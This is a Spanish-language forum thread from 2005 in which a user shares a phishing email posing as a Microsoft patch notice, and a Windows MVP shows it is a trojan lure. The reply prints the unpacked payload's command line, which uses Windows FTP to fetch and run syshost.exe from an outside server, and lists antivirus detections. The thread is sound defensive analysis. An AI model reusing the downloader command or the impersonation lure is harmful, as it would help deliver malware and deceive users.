Alerta del virus "Harderzoll"

09/12/2005 - 01:06 por RubénDM | Informe spam
Hola a todos:

Acabo de recibir un e-mail que tiene toda la pinta de tratarse de un virus.
No he encontrado información al respecto en Internet, así que era para
preguntar si sabíais algo del tema, si es el primer mensaje del que tenéis
noticia...

-
¡Atención!

Estimados señores:

Por la presente permitan que les advierta que la red de Internet está
peligrada.
Según el informe de nuestro personal de la seguridad en la red de Internet ha
empezado a trascender el virus nuevo que se ha denominado “Harderzoll”.

Al introducirse en su ordenador ese virus empieza a atacar todos los
elementos
principales de su ordenador y actuando así puede romper toda la red.

También según nuestro estimar en consecuencia ese virus habrá podido robar el
número de su ficha y de la cuenta bancaria.

En el instante presente se estudia muy enérgicamente el código del virus
mencionado.

Como es sabido que ese virus puede transformarse independientemente e
introducir
en el ordenador sin cualquier obstáculos y estorbos rebasando los antivirus y
muros contrafuegos de toda clase.

Hemos publicado el remiendo primero que permita sortear el ordenador del
virus.

Estamos encarecidamente para aconsejarles que establezcan ese remiendo como
se
le dejará a protegerse contra el asalto de virus en todo el sistema de
Internet.

Les aconsejamos que hagan Ustedes como sigue:

1) bajar el remiendo;
http://www.microsoft.com/spain/anti...update.exe
<http://www.austria-arbeit.com/updat...te.exe>

2) arrancarlo.

3) rearrancar su ordenador.

Volveremos a invocar que recuerden del virus y que nuestro remiendo puede
resguardarse de los ataques y conservar su información personal y particular.

Les rogamos que tengan la vigilancia y estén alerta, y que también siguen
nuestras novedades.





©2005 Microsoft Corporation. Todos los derechos reservados
-

Saludos
 

Leer las respuestas

#1 Ramón Sola [MVP Windows - Shell/User]
09/12/2005 - 02:20 | Informe spam
Hash: SHA1

Es un engaño. Mira, la transformación de HTML a texto plano ha revelado el
enlace verdadero:

<pego>
1) bajar el remiendo;
http://www.microsoft.com/spain/anti...update.exe
<http://www.austria-arbeit.com/updat...te.exe>
</pego>

Aparte, los errores gramaticales y de vocabulario hacen sospechar de la
falsedad del mensaje.

Al inspeccionar el fichero Update.exe se observa que está comprimido con la
herramienta UPX. El análisis del servicio VirusTotal.com no informa de nada
extraño. Sin embargo, al descomprimirlo se puede ver la siguiente cadena
dentro del fichero:

cmd /c echo open ftp.anyforce.info>o&echo user mazafaka>>o&echo
mazafaka>>o&echo binary>>o&echo get syshost.exe
%windir%\system32\syshost.exe>>o&echo bye>>o&ftp -n -d -s:o&del
o&%windir%\system32\syshost.exe&exit

Esta es una línea de comandos que usa el cliente FTP de Windows para
conectar al servidor ftp.anyforce.info con usuario y contraseña mazafaka y
descarga un fichero syshost.exe, que después se ejecuta. De los antivirus
de los que dispone VirusTotal, sólo uno identifica actualmente como amenaza
la versión descomprimida de Update.exe:

Antivirus Versión Actualización Resultado
ClamAV devel-20051108 08.12.2005 Trojan.Delf-62

En cambio, el fichero Syshost.exe del FTP constituye una amenaza mucho más
seria:

Antivirus Versión Actualización Resultado
AntiVir 6.33.0.61 08.12.2005 BDS/Delf.abc
Avast 4.6.695.0 07.12.2005 Win32:Delf-CX
AVG 718 08.12.2005 BackDoor.Generic.XKZ
Avira 6.33.0.61 08.12.2005 BDS/Delf.abc
BitDefender 7.2 09.12.2005 Backdoor.Delf.ABC
CAT-QuickHeal 8.00 08.12.2005 Backdoor.Delf.abc
ClamAV devel-20051108 08.12.2005 Exploit.DCOM.Gen
DrWeb 4.33 08.12.2005 Trojan.PWS.Banker.1311
eTrust-Iris 7.1.194.0 07.12.2005 MS03-026_Exploit!Trojan
eTrust-Vet 11.9.1.0 08.12.2005 Win32.Kassbot.O
Fortinet 2.54.0.0 09.12.2005 W32/Francette.Y!bdr
F-Prot 3.16c 07.12.2005 security risk named
W32/Backdoor.HJM
Ikarus 0.2.59.0 09.12.2005 Email-Worm.Win32.Kitro.D
Kaspersky 4.0.2.24 09.12.2005 Backdoor.Win32.Delf.abc
McAfee 4646 08.12.2005 W32/Generic.worm.b
NOD32v2 1.1316 08.12.2005 a variant of Win32/Tumbi
Norman 5.70.10 08.12.2005 no ha encontrado virus
Panda 8.02.00 08.12.2005 Bck/Delf.UN
Sophos 4.00.0 08.12.2005 W32/Francette-Y
Symantec 8.0 07.12.2005 no ha encontrado virus
TheHacker 5.9.1.051 08.12.2005 Backdoor/Delf.abc
VBA32 3.10.5 08.12.2005 Backdoor.Win32.Delf.abc


Recuerda: Microsoft JAMÁS envía ficheros adjuntos (no es este el caso) ni
*enlaces directos* a ficheros ejecutables, y menos aún si no se han
solicitado.

Ramón Sola / / MVP Windows - Shell/User
Para obtener la dirección correcta no hacen falta los sellos.
Por favor, usar el correo sólo para cuestiones ajenas a los
grupos de noticias, gracias.

Cuentan que "RubénDM" <Rubé escribió en el
mensaje news: lo
siguiente:
Hola a todos:

Acabo de recibir un e-mail que tiene toda la pinta de tratarse de un
virus. No he encontrado información al respecto en Internet, así que era
para preguntar si sabíais algo del tema, si es el primer mensaje del que
tenéis noticia...

-
¡Atención!

Estimados señores:

Por la presente permitan que les advierta que la red de Internet está
peligrada.
Según el informe de nuestro personal de la seguridad en la red de
Internet ha empezado a trascender el virus nuevo que se ha denominado
“Harderzoll”.

Al introducirse en su ordenador ese virus empieza a atacar todos los
elementos
principales de su ordenador y actuando así puede romper toda la red.

También según nuestro estimar en consecuencia ese virus habrá podido
robar el número de su ficha y de la cuenta bancaria.

En el instante presente se estudia muy enérgicamente el código del virus
mencionado.

Como es sabido que ese virus puede transformarse independientemente e
introducir
en el ordenador sin cualquier obstáculos y estorbos rebasando los
antivirus y muros contrafuegos de toda clase.

Hemos publicado el remiendo primero que permita sortear el ordenador del
virus.

Estamos encarecidamente para aconsejarles que establezcan ese remiendo
como se
le dejará a protegerse contra el asalto de virus en todo el sistema de
Internet.

Les aconsejamos que hagan Ustedes como sigue:

1) bajar el remiendo;
http://www.microsoft.com/spain/anti...update.exe
<http://www.austria-arbeit.com/updat...te.exe>

2) arrancarlo.

3) rearrancar su ordenador.

Volveremos a invocar que recuerden del virus y que nuestro remiendo puede
resguardarse de los ataques y conservar su información personal y
particular.

Les rogamos que tengan la vigilancia y estén alerta, y que también siguen
nuestras novedades.





©2005 Microsoft Corporation. Todos los derechos reservados.
-

Saludos

Preguntas similares